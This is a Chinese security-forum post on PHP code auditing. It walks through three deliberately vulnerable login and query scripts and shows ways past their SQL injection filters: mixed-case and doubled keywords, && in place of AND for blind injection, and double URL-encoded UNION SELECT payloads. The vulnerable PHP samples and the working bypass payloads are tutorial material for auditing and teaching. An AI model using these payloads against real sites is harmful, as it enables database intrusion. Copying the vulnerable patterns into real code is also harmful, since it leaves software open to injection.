安全矩阵

 找回密码
 立即注册
搜索
查看: 2731|回复: 0

php代码审计-sql注入进阶篇

[复制链接]

180

主题

231

帖子

1180

积分

金牌会员

Rank: 6Rank: 6

积分
1180
发表于 2021-10-17 20:24:34 | 显示全部楼层 |阅读模式
原文链接:php代码审计-sql注入进阶篇

关键字过滤
[color=rgb(51, 51, 51) !important]部分waf会对关键字进行过滤,我们可以用大小写或者双写关键字来绕过。
源代码分析
  1. <?php
  2. require 'db.php';
  3. header('Content-type:text/html;charset=utf8');
  4. $username=dl($_POST['username']);
  5. $password=dl($_POST['password']);
  6. $dl="SELECT * FROM xs WHERE username='$username' and password='$password'"; //登录界面后台处理
  7. $ck=mysqli_query($db,$dl);
  8. $row = mysqli_fetch_array($ck);
  9. if($_POST['login']){
  10. if($row) {
  11. echo"你的密码".$row['username'];
  12. }else{
  13. echo"登录失败";
  14. }
  15. }
  16. function dl($gl){
  17. $gl=str_replace(array("union","UNION"),"","$gl");
  18. $gl=str_replace(array("select","SELECT"),"","$gl");
  19. $gl=str_replace(array("database","DATABASE"),"","$gl");
  20. $gl=str_replace(array("sleep","SLEEP"),"","$gl");
  21. $gl=str_replace(array("if","IF"),"","$gl");
  22. $gl=str_replace("--","","$gl");
  23. $gl=str_replace("order","","$gl");
  24. return $gl;
  25. }
复制代码
[color=rgb(51, 51, 51) !important]分析一下代码,首先获取了数据,加载dl函数以后带入了数据库中执行,然后if判定是否有提交,是否登录成功,登录成功后回显用户的账号,这是一个非常简单的后台登录代码。往下看有一个自定义函数dl,函数内使用了str_replace(),str_replace()的作用是替换字符串,这里union,select,database ,if这些常用的注入字符大小写都被替换成空。做了一个简单的危险字符过滤自定义函数。
关键字过滤注入方法
[color=rgb(51, 51, 51) !important]用大小写和双写关键字来尝试绕过,返回代码里有回显位所以可以union注入,dl函数把union,select这些字符替换成空但是mysql中是不不区分大小写的,所以可以大小写混写来绕过dl函数的过滤。比如Select Union DAtabase()这样的字符是可以执行的。也可以用双写的手法,比如seselectlect这样的语句, dl函数会把里面的select替换为空这样两边的字符凑在一起刚好又是一个select这样就起到了绕过的作用。
[color=rgb(51, 51, 51) !important]大小写绕过语句为
  1. -1’ unioN Select dataBASE(),2 #
复制代码
[color=rgb(51, 51, 51) !important]
[color=rgb(51, 51, 51) !important]双写关键字绕过语句为
  1. -1’ ununionion selecselectt databasdatabasee(),2 #
复制代码


or and xor not过滤
[color=rgb(51, 51, 51) !important]or and xor not 像这样的逻辑运算也会被过滤袋掉那我们怎么绕过呢?
源代码分析
  1. <?php
  2. require 'db.php';
  3. header('Content-type:text/html;charset=utf8');
  4. $username=dl($_POST['username']);
  5. $password=dl($_POST['password']);
  6. $zifu='/(and|or|xor|not)/i';
  7. if(preg_match("$zifu","$username&&$password")){
  8. echo "<script>alert('存在危险字符')</script>";
  9. }
  10. $dl="SELECT * FROM xs WHERE username='$username' and password='$password'"; //登录界面后台处理
  11. $ck=mysqli_query($db,$dl);
  12. $row = mysqli_fetch_array($ck);
  13. if($_POST['login']){
  14. if($row) {
  15. echo"登录成功";
  16. }else{
  17. echo"登录失败";
  18. }
  19. }
  20. function dl($gl){
  21. $gl=str_replace(array("union","UNION"),"","$gl");
  22. $gl=str_replace(array("select","SELECT"),"","$gl");
  23. $gl=str_replace(array("database","DATABASE"),"","$gl");
  24. $gl=str_replace(array("sleep","SLEEP"),"","$gl");
  25. $gl=str_replace(array("if","IF"),"","$gl");
  26. $gl=str_replace("--","","$gl");
  27. $gl=str_replace("order","","$gl");
  28. return $gl;
  29. }
  30. ?>
复制代码
[color=rgb(51, 51, 51) !important]阅读一遍代码发现在上一段的基础上面添加了一个preg_match函数,这个函数过滤了or and xor not关键字,需要注意的是preg_match会大小写都过滤,继续往下读回显位改成了成功或者失败所以我们只能采用盲注或者延时注入。
逻辑运算符绕过
[color=rgb(51, 51, 51) !important]先尝试大小写绕过,果然是失败的。
[color=rgb(51, 51, 51) !important]
[color=rgb(51, 51, 51) !important]使用逻辑运算符尝试
  1. and = &&
  2. or = ||
  3. xor = | # 异或
  4. not = !
复制代码
[color=rgb(51, 51, 51) !important]使用&&代替and构造盲注语句1’ && length(DATAbase())=3 # 因为关键字过滤函数还在所以还同时需要大小写绕过。
[color=rgb(51, 51, 51) !important]

[color=rgb(51, 51, 51) !important]注入成功
url编码绕过
[color=rgb(51, 51, 51) !important]在平常使用url提交数据时,web容器在接到url后会自动进行一次url编码解析,但是由于业务问题有些网站在web容器自动解析之后,通过编写程序对解析的参数进行再次url编码解析,就会出大问题。
源代码分析

  1. <?php
  2. require 'db.php';
  3. header('Content-type:text/html;charset=utf8');
  4. $id1=$_GET['id'];
  5. $gl="/and|or|not|xor|length|union|select|database|if|sleep|substr/i";
  6. if(preg_match($gl,$id1)){
  7. echo"<script>alert('存在危险字符')</script>";
  8. }else{
  9. $id=urldecode($id1);
  10. $dl="SELECT * FROM xs WHERE id='$id'";
  11. $result=mysqli_query($db,$dl);
  12. $row = mysqli_fetch_assoc($result);
  13. if($_GET['id']) {
  14. if ($row) {
  15. echo "登录成功:" . $row['username'];
  16. }
  17. }}
  18. ?>
复制代码
[color=rgb(51, 51, 51) !important]上来还是先看看代码,把客户端传入的get参数赋值进了$id1,用if加preg_match对变量$id1的值进行检索。如果客户端传入的参数有$gl里的值,那么就会返回前端代码进行警告。没有危险字符才会执行下面的代码,接着把$id1里的参数进行一次url解编码并赋值给$id。此时客户端传入的参数已经经过了两次url编码解析。最后过滤完成把id变量带入数据库中进行查询并返回用户的账号。
注入语句
[color=rgb(51, 51, 51) !important]分析代码时说到客户端传入的参数会进行两次url编码解析之后带入数据库,但危险过滤是在第一次解析之后第二次解析之前执行的。也就是说我们可以写入两次url编码过的语句绕过preg_match,比如and在过滤范围之中,对and一次url全编码后变为%61%6e%64%0,再进行一次编码为%25%36%31%25%36%65%25%36%34。把经过两次编码后的and提交数据会经过web容器解码后变为%61%6e%64,preg_match判定就不会触发。
构造尝试语句
[color=rgb(51, 51, 51) !important]把-1’ union  select database(),2,3 —+编码为-1’
[color=rgb(51, 51, 51) !important]%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65 %25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34 %25%36%34%25%36%31%25%37%34%25%36%31%25%36%32%25%36%31%25%37%33%25%36%35(),2,3 —+

[color=rgb(51, 51, 51) !important]





本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-22 22:20 , Processed in 0.017784 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表